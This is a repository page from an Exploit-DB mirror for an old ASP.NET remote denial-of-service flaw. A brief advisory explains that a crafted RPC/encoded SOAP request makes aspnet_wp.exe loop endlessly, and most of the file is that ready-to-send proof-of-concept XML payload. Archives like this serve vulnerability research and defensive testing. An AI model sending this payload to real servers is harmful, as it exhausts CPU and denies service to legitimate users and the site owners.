bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/dos/25962.xml
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

26 lines
No EOL
1.1 KiB
XML
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/14217/info
ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests.
This issue presents itself when an RPC/encoded Web method accepts an array or object derived from 'IList'. By sending a specially crafted XML request, the 'aspnet_wp.exe' executable enters into an infinite loop.
Remote attackers may exploit this vulnerability to consume excessive CPU resources, potentially denying service to legitimate users.
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>
Reference in a new issue View git blame Copy permalink